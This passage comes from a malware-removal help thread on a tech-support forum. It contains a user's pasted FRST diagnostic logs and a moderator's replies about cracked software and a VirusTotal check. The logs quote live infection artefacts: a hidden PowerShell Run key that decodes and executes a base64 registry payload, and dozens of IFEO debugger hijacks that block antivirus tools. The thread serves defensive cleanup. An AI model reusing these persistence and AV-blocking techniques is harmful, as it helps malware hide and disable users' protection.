2011-12-19 14:11 - 2011-12-19 14:10 - 00043008 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\libgcc_s_dw2-1.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 02415104 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtCore4.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 01148416 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtNetwork4.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 00384512 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QueryStrategy.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 00398336 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtXml4.dll
2016-05-11 08:48 - 2016-05-11 08:48 - 00041472 _____ () C:\Program Files\TunnelBear\TBear.Maintenance.exe
2016-09-14 09:30 - 2016-09-14 09:30 - 19588800 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_162.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [119]
AlternateDataStreams: C:\ProgramData\TEMP:AD022376 [131]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\N1Service => ""="service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-19\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-19\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-19\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-19\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-20\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-20\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-20\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-20\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\sony.com -> sony.com

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:04 - 2016-03-12 11:16 - 00000967 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^violeta^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Minecraft Gift Code Generator 2015.lnk => C:\Windows\pss\Minecraft Gift Code Generator 2015.lnk.Startup
MSCONFIG\startupfolder: C:^Users^violeta^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: AdobeCS4ServiceManager => "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: BingSvc => C:\Users\violeta\AppData\Local\Microsoft\BingSvc\BingSvc.exe
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: ProductUpdater => C:\Program Files\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files\PowerISO\PWRISOVM.EXE -startup
MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Trend Micro Titanium => C:\Program Files\Trend Micro\Titanium\UIFramework\uiWinMgr.exe -set Silent "1" SplashURL ""
MSCONFIG\startupreg: uTorrent => "C:\Users\violeta\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
MSCONFIG\startupreg: WinampAgent => "C:\Program Files\Winamp\winampa.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled
02-10-2016 19:00:52 Windows Backup
09-10-2016 19:02:11 Windows Backup

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/14/2016 09:37:50 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files\Steam\bin\steamwebhelper.exe

Error: (10/14/2016 02:10:02 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files\Steam\bin\steamwebhelper.exe

Error: (10/13/2016 09:04:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CompatTelRunner.exe, version: 10.0.14913.1002, time stamp: 0x57d102c7
Faulting module name: devinv.dll, version: 10.0.14913.1002, time stamp: 0x57d1049e
Exception code: 0xc0000005
Fault offset: 0x0002ec20
Faulting process id: 0x16e4
Faulting application start time: 0x01d2251cd937f0d3
Faulting application path: C:\Windows\system32\CompatTelRunner.exe
Faulting module path: C:\Windows\system32\devinv.dll
Report Id: 3aa44c8c-9113-11e6-8fc5-6c626daeeb0d

Error: (10/12/2016 10:58:40 PM) (Source: Windows Search Service) (EventID: 3007) (User: )
Description: Performance monitoring cannot be initialized for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.

Context: Application, SystemIndex Catalog

Error: (10/12/2016 03:17:00 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: NIKOLA-PC)
Description: HRESULT:0x8004FF0A
Description:Microsoft Security Essentials installation was canceled. You canceled the Security Essentials installation on your computer. Error code:0x8004FF0A.

Error: (10/06/2016 05:34:29 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: NIKOLA-PC)
Description: HRESULT:0x8004FF81
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x8004FF81.

Error: (10/06/2016 05:33:53 PM) (Source: MsiInstaller) (EventID: 11920) (User: NIKOLA-PC)
Description: Product: Microsoft Security Client -- Error 1920. Service 'Microsoft Antimalware Service' (MsMpSvc) failed to start. Verify that you have sufficient privileges to start system services.

Error: (10/03/2016 12:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: webplayer_win.dll_unloaded, version: 0.0.0.0, time stamp: 0x557572cf
Exception code: 0xc0000005
Fault offset: 0x066bbab8
Faulting process id: 0x7fc
Faulting application start time: 0x01d21d5ae9318998
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: webplayer_win.dll
Report Id: 29c3f0e0-8953-11e6-ae4e-6c626daeeb0d

Error: (10/02/2016 08:25:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: mozglue.dll, version: 49.0.1.6109, time stamp: 0x57e43eea
Exception code: 0x80000003
Fault offset: 0x0000e846
Faulting process id: 0x1c00
Faulting application start time: 0x01d21cc346a799d6
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files\Mozilla Firefox\mozglue.dll
Report Id: 9aac06d4-88cd-11e6-8fc8-6c626daeeb0d

Error: (10/02/2016 08:25:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: mozglue.dll, version: 49.0.1.6109, time stamp: 0x57e43eea
Exception code: 0x80000003
Fault offset: 0x0000e846
Faulting process id: 0x1a2c
Faulting application start time: 0x01d21cd94ba02c13
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files\Mozilla Firefox\mozglue.dll
Report Id: 91f51069-88cd-11e6-8fc8-6c626daeeb0d


System errors:
=============
Error: (10/14/2016 10:07:31 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
sfdrv01
sfsync02

Error: (10/14/2016 10:07:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Telenor Internet. OUC service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (10/14/2016 10:07:19 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Telenor Internet. OUC service to connect.

Error: (10/14/2016 10:07:15 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Skype C2C Service service to connect.

Error: (10/14/2016 10:07:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Origin Web Helper Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (10/14/2016 10:07:13 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Origin Web Helper Service service to connect.

Error: (10/14/2016 1040 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HWDeviceService.exe service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 1032 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Trend Micro Solution Platform service failed to start due to the following error:
Access is denied.

Error: (10/14/2016 1008 PM) (Source: Application Popup) (EventID: 875) (User: )
Description: Driver sfdrv01.sys has been blocked from loading.

Error: (10/14/2016 1006 PM) (Source: Application Popup) (EventID: 875) (User: )
Description: Driver sfsync02.sys has been blocked from loading.


==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU E3400 @ 2.60GHz
Percentage of memory in use: 48%
Total physical RAM: 2013.18 MB
Available physical RAM: 1034.57 MB
Total Virtual: 2588.18 MB
Available Virtual: 1340.15 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:459.9 GB) (Free:43.06 GB) NTFS
Drive d: (SPYRO_DVD) (CDROM) (Total:7.16 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 33317A4D)
Partition 1: (Active) - (Size=5.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=459.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


The ckfiles.txt log did not fit in the allowed amount of characters, so I will simply attach it.
Attached Files
File Type: txt ckfiles.txt (22.9 KB, 28 views)
nikolap is offline  
Old 10-15-2016, 02:54 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Quote:
c:\users\violeta\desktop\rpg maker mv plugins\rmmv-crack\rmmv - crack\windows 7\rpgmv.exe
c:\users\violeta\desktop\rpg maker mv plugins\rmmv-crack\rmmv - crack\windows 8-10\rpgmv.exe
c:\users\violeta\documents\spore\crack\rld-spor.exe
c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip
c:\users\violeta\desktop\sve sa desktopa\ssb crusade v0.9 patch\crypt.dll
c:\users\violeta\desktop\stellaris +updates\stellaris.update.v1.1.0.to.v1.2.1-rezmar\cracks\codex\steam_api.dll
c:\users\violeta\desktop\cracks\crack codex\steam_api.dll
c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip
c:\users\violeta\music\violeta za budjenje\keygen.exe
This is the main reason your computer is infected. Visiting cracksites/warezsites - and other questionable/illegal sites is always a risk.

Even a single click on the site can drop multiple forms of very serious malware, many of which disable your onboard protection, and System Restore.

If you install the cracked software, you are running executable files from these dubious, unknown sources. You are in effect giving these sources access to information on your hard disk, and potential control over the operation of your computer.

Additionally, cracked programs are illegal. Before posting for help, we ask that you uninstall any such applications, as indicated in this sticky topic.

Referring to the Forum Rules which you should have read at the time of Registering at this forum, TSF does not support illegal activity. As such, be advised that any request for assistance in removing malware may go unanswered, or may be discontinued, if the cracked (illegal) software is still present on the machine.

A recent study revealed that more often than not, keygens and crack tools downloaded from peer-to-peer networks contained malicious or "unwanted" software.

------------------------------------------------------

==== Installed Programs ====

RPG Maker MV
RPG MAKER VX Ace RTP
SPORE
Steam
Stellaris
UnHackMe


------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-15-2016, 11:58 PM   #5
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



I have dealt with (de-installed) all illegal content that you said was illegal, but I did not pirate or get some illegal copy of SSBC (Super Smash Bros 0.9); I got the game from the link the devs have given us on Facebook, the game's forum and so on.
With all of the cracked and pirated content gone, I checked the firewall again.
It seems to not be fixed. My guess is because those files were used before the problem, which I noticed when I was deleting.
*NOTE: none of my problem is illegal (my Windows is genuine, I am listening to your instructions and following them). This is a serious problem and someone might have a similar problem in the future.
**NOTE: I ask for help. If you need all of the other logs, I can make them again as proof and as a thing for progression.
nikolap is offline  
Old 10-16-2016, 01:12 PM   #6
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. Did you also delete all those cracked installers listed?

Please run FRST.exe again and post/attach the FRST.txt/Addition.txt logs as before.

Make sure you tick the Addition.txt box before clicking 'Scan'.

Instead of pasting the Attach.txt log in your reply, just please attach it to your next reply.

Also, when you first copy/pasted the FRST.txt log, you didn't paste the entire log. The bottom part was missing.

Make sure you copy and paste the entire FRST.txt log. Thanks.

------------------------------------------------------

Please go to: VirusTotal
  • Click the Choose File button.
  • Please copy/paste the following bolded text into the 'File name:' box:

    C:\Windows\system32\Microsoft.com

  • Click Open then click the Scan it! button just below.
  • This will scan the file. Please be patient.
  • If you get a message saying File already analysed: click Reanalyse
  • Once scanned, copy and paste the URL from your browser address bar in your next reply.
----------------------------------------------------
chemist is offline  
Old 10-16-2016, 10:00 PM   #7
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



The microsoft.com file:
hxxps://www.virustotal.com/en/file/97bd627ebfc4d40b21ebaaed916a1ba53859520edc99537b37d042a0d5425a5a/analysis/1476680245/
The entire FRST.txt log:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 16-10-2016
Ran by violeta (administrator) on NIKOLA-PC (17-10-2016 06:40:43)
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
() C:\Windows\System32\PnkBstrA.exe
() C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
(Razer Inc.) C:\Program Files\Razer\Razer Cortex\RzKLService.exe
(ShadowExplorer.com - About) C:\Program Files\ShadowExplorer\sesvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Rocket Division Software) C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\Program Files\TunnelBear\TBear.Maintenance.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation.) C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.EXE
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5565960 2016-09-13] (LogMeIn Inc.)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [AlcoholAutomount] => C:\Program Files\Alcohol Soft\Alcohol 120\axcmd.exe [203928 2009-04-24] (Alcohol Soft Development Team)
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [280576 2013-04-30] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2}: [DhcpNameServer] 172.18.12.1
Tcpip\..\Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518}: [NameServer] 217.65.192.101 217.65.192.102

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE07&ocid=UE07DHP
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)
